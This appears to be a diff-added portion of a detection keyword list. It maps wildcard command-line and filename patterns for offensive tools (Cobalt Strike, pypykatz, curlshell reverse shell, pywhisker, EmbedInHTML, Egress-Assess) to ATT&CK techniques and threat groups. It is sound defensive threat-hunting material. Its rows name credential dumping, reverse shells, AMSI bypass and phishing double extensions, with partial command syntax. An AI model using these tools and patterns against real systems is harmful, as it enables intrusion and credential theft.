+"*.pic.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.pipename_stager*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.pop.123456.*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*.ppt.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ppt.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.bat*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.dll*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.exe*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.htm*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.jar*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.js*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.sfx*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.pptx.vbs*","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*.ps1 -Base *OU=*DC=* -Credentials * -Server *","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*.py -credz *.txt * ","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*.py -k * -f *.bat -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.docm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.docx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.exe -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.js -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.pps -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.ppsx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.ppt -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.ps1 -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.xll -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.xls -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.xlsb -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.xlsm -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py -k * -f *.xlsx -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py rekall *.dmp* -t 0","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*.py * --fake-server*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*.py * amsi -disable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*.py * amsi -enable*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*.py * --brop *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"*.py * --burp *","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*.py * -debug -dnstcp*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" +"*.py * -k -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*.py * --teamserver *","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*.py *.cs cs ms*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"*.py *.exe *NormalDLL.dll*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","0","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" +"*.py *0.0.0.0*--serve-forever*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py *--dependabot-workaround*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py 127.0.0.1 50050 logtracker password*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*.py -aesKey ""9ff86898afa70f5f7b9f2bf16320cb38edb2639409e1bc441ac417fac1fed5ab""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*.py --certificate *.pem --private-key *.pem --listen-port *","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*.py --client ftp --username * --password * --ip * --datatype ssn*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*.py --client https --data-size * --ip * --datatype cc*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*.py -d ""test.local"" -u ""john"" -p ""password123"" --target ""user2"" --action ""list"" --dc-ip ""10.10.10.1""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*.py -d * -u * -p * --target * --action * --export PEM*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*.py -d * -u * -p * --target * --action ""add"" --filename * ","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*.py -d * -u * -p * --target * --action ""clear""* ","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*.py -d * -u * -p * --target * --action ""info"" --device-id *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*.py -d * -u * -p * --target * --action ""list"" *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*.py -d * -u * -p * --target * --action ""remove"" --device-id *","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*.py discover -H domain_list.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*.py enum -H * -U *.txt -P *.txt -*.txt*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*.py -f *.exe -e -m 4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*.py --file *.ps1 --server amsi*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*.py -k * -f *.doc -o *.html*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*.py lock -H * -u administrator -d *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*.py -method BOTH -dc-ip *","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" 